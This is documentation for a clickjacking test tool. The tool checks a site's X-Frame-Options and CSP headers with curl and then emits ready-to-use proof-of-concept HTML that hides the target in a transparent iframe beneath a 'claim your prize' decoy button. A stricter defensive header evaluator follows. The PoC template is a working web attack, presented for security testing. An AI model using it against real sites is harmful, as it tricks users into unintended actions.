clickjacking_test
Test websites for clickjacking vulnerabilities by checking X-Frame-Options and CSP headers, then generate proof-of-concept HTML if protections are missing.
Instructions
Check X-Frame-Options and CSP frame-ancestors headers; generate PoC iframe HTML. Fetches response headers and checks for framing protections. If protections are missing, generates a ready-to-use PoC HTML page that embeds the target in a transparent iframe with a decoy button overlay. Returns: {headers, x_frame_options, csp_frame_ancestors, vulnerable, poc_html}. Side effects: Single HEAD/GET request.
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| target_url | Yes | URL to test for clickjacking vulnerability, e.g. https://target/my-account | |
Implementation Reference
- src/tools/clickjack.ts:23-125 (handler) Handler implementation for the clickjacking_test tool, which fetches headers and generates a PoC HTML if vulnerable.

```typescript
// Handler body as registered in src/tools/clickjack.ts. requireTool and runCmd
// are the project's own helpers, declared elsewhere in the code base.
async ({ target_url }) => {
  requireTool("curl");

  // Fetch headers: `-D -` dumps the response headers to stdout, `-o /dev/null`
  // discards the body. Without `-L`, curl does not follow redirects, so a 3xx
  // answer is what gets evaluated, not the page it redirects to.
  const res = await runCmd("curl", [
    "-sk",
    "-D",
    "-",
    "-o",
    "/dev/null",
    target_url,
  ]);
  const headersRaw = res.stdout;

  // Header map keyed by lower-cased name. A repeated header overwrites the
  // earlier value, so only the last Content-Security-Policy header is parsed.
  const headers: Record<string, string> = {};
  let xfo: string | null = null;
  let cspFrame: string | null = null;

  for (const line of headersRaw.split("\n")) {
    if (line.includes(":")) {
      const colonIdx = line.indexOf(":");
      const name = line.slice(0, colonIdx).trim().toLowerCase();
      const value = line.slice(colonIdx + 1).trim();
      headers[name] = value;
      if (name === "x-frame-options") {
        xfo = value;
      } else if (name === "content-security-policy") {
        // Presence of a frame-ancestors directive counts as protection; its
        // source list is not inspected, so `frame-ancestors *` is also
        // reported as protected.
        for (const directive of value.split(";")) {
          const d = directive.trim();
          if (d.startsWith("frame-ancestors")) {
            cspFrame = d;
          }
        }
      }
    }
  }

  // Vulnerable only when neither protection header is present at all.
  const vulnerable = xfo === null && cspFrame === null;

  let pocHtml: string | null = null;
  if (vulnerable) {
    pocHtml = `<!DOCTYPE html>
<html>
<head>
  <title>Clickjacking PoC</title>
  <style>
    #target_iframe {
      position: relative;
      width: 800px;
      height: 600px;
      opacity: 0.0001;
      z-index: 2;
    }
    #decoy_button {
      position: absolute;
      top: 300px;
      left: 200px;
      z-index: 1;
      padding: 15px 30px;
      font-size: 18px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <h1>Click the button to claim your prize!</h1>
  <button id="decoy_button">Click here!</button>
  <iframe id="target_iframe" src="${target_url}"></iframe>
</body>
</html>`;
  }

  // Other security-relevant headers are echoed back for context.
  const securityHeaderKeys = new Set([
    "x-frame-options",
    "content-security-policy",
    "x-content-type-options",
    "strict-transport-security",
    "x-xss-protection",
    "referrer-policy",
    "permissions-policy",
  ]);
  const allSecurityHeaders: Record<string, string> = {};
  for (const [k, v] of Object.entries(headers)) {
    if (securityHeaderKeys.has(k)) {
      allSecurityHeaders[k] = v;
    }
  }

  const result = {
    target_url,
    x_frame_options: xfo,
    csp_frame_ancestors: cspFrame,
    all_security_headers: allSecurityHeaders,
    vulnerable,
    poc_html: pocHtml,
    hint: vulnerable
      ? "No framing protections detected. Target can be embedded in an attacker-controlled iframe."
      : "Framing protections present.",
  };
  return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] };
}
```

- src/tools/clickjack.ts:14-22 (registration) Tool registration and parameter definition for clickjacking_test. `z` is the zod schema builder used by the project.

```typescript
// Arguments passed to the tool-registration call (the call itself is outside
// this excerpt): tool name, description, and the zod input schema.
"clickjacking_test",
"Check X-Frame-Options and CSP frame-ancestors headers; generate PoC iframe HTML. Fetches response headers and checks for framing protections. If protections are missing, generates a ready-to-use PoC HTML page that embeds the target in a transparent iframe with a decoy button overlay. Returns: {headers, x_frame_options, csp_frame_ancestors, vulnerable, poc_html}. Side effects: Single HEAD/GET request.",
{
  target_url: z
    .string()
    .describe(
      "URL to test for clickjacking vulnerability, e.g. https://target/my-account"
    ),
},
```
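The handler above treats the mere presence of `X-Frame-Options` or a `frame-ancestors` directive as protection. The following is an added example, not code from the clickjacking_test tool, showing how a defender would evaluate what those headers actually enforce: it keeps duplicate headers, ignores `Content-Security-Policy-Report-Only` (which never blocks), flags `frame-ancestors *` or a bare scheme as still framable, and treats `ALLOW-FROM` or other invalid `X-Frame-Options` values as ignored by current browsers. The names `parseHeaders`, `frameAncestorsSources`, `evaluateFraming` and `FramingVerdict` are this example's own, and the header blocks in `SAMPLES` are constructed, not captured from any site.

```typescript
// Added example (not part of the clickjacking_test tool): decide whether a
// response's headers actually enforce a framing restriction.

type Mechanism = "csp-frame-ancestors" | "x-frame-options" | "none";

interface FramingVerdict {
  framable: boolean;    // true = an arbitrary origin could embed the page
  mechanism: Mechanism; // which header decided the verdict
  reason: string;
}

// Parse a raw header block (the format `curl -D -` prints) into a map of
// lower-cased name -> all values. Duplicates are kept because a server may
// send several Content-Security-Policy headers, and every one is enforced.
function parseHeaders(raw: string): Record<string, string[]> {
  const out: Record<string, string[]> = {};
  for (const line of raw.split(/\r?\n/)) {
    if (/^HTTP\//i.test(line)) continue; // status line, e.g. "HTTP/2 200"
    const idx = line.indexOf(":");
    if (idx <= 0) continue;              // blank or malformed line
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    const list = out[name] ?? [];
    list.push(value);
    out[name] = list;
  }
  return out;
}

// Source list of a policy's frame-ancestors directive (lower-cased), or null
// when the policy has no such directive.
function frameAncestorsSources(policy: string): string[] | null {
  for (const directive of policy.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter((t) => t.length > 0);
    const head = tokens[0];
    if (head !== undefined && head.toLowerCase() === "frame-ancestors") {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Source expressions that let any origin embed the page: the wildcard, or a
// bare scheme, which matches every host using that scheme.
const PERMISSIVE_SOURCES = new Set(["*", "http:", "https:"]);

function evaluateFraming(headers: Record<string, string[]>): FramingVerdict {
  // Browsers that support frame-ancestors give it precedence over
  // X-Frame-Options. Content-Security-Policy-Report-Only is deliberately not
  // consulted: it only reports violations and never blocks framing.
  for (const policy of headers["content-security-policy"] ?? []) {
    const sources = frameAncestorsSources(policy);
    if (sources === null) continue;
    const permissive = sources.find((s) => PERMISSIVE_SOURCES.has(s));
    if (permissive !== undefined) {
      return { framable: true, mechanism: "csp-frame-ancestors",
        reason: `frame-ancestors contains "${permissive}", which matches any origin` };
    }
    return { framable: false, mechanism: "csp-frame-ancestors",
      reason: `frame-ancestors restricts embedding to: ${sources.join(" ")}` };
  }

  const xfoValues = headers["x-frame-options"] ?? [];
  const enforced = xfoValues.find((v) => {
    const u = v.trim().toUpperCase();
    return u === "DENY" || u === "SAMEORIGIN";
  });
  if (enforced !== undefined) {
    return { framable: false, mechanism: "x-frame-options", reason: `X-Frame-Options: ${enforced}` };
  }
  if (xfoValues.length > 0) {
    // ALLOW-FROM and any other value are invalid in current browsers and are
    // ignored, which leaves the page framable despite the header being present.
    return { framable: true, mechanism: "x-frame-options",
      reason: `X-Frame-Options value "${xfoValues[0]}" is not honoured by current browsers` };
  }

  return { framable: true, mechanism: "none",
    reason: "neither frame-ancestors nor X-Frame-Options is set" };
}

// Constructed sample responses (not captured from any real site).
const SAMPLES: Record<string, string> = {
  unprotected: "HTTP/2 200\r\ncontent-type: text/html\r\n\r\n",
  wildcard: "HTTP/2 200\r\ncontent-security-policy: default-src 'self'; frame-ancestors *\r\n\r\n",
  reportOnly: "HTTP/2 200\r\ncontent-security-policy-report-only: frame-ancestors 'none'\r\n\r\n",
  obsoleteXfo: "HTTP/2 200\r\nx-frame-options: ALLOW-FROM https://partner.example\r\n\r\n",
  hardened: "HTTP/2 200\r\ncontent-security-policy: frame-ancestors 'self' https://partner.example\r\nx-frame-options: SAMEORIGIN\r\n\r\n",
};

function verdictFor(sampleName: string): FramingVerdict {
  return evaluateFraming(parseHeaders(SAMPLES[sampleName] ?? ""));
}

for (const name of Object.keys(SAMPLES)) {
  const v = verdictFor(name);
  console.log(`${name}: framable=${v.framable} via ${v.mechanism} (${v.reason})`);
}
```

Run against the tool's own curl output, `evaluateFraming(parseHeaders(res.stdout))` would mark the `wildcard`, `reportOnly` and `obsoleteXfo` cases as framable where the handler reports them as protected; only `hardened` is a real block. The redirect caveat still applies to whatever header block is fed in: headers from a 3xx response say nothing about the page it redirects to.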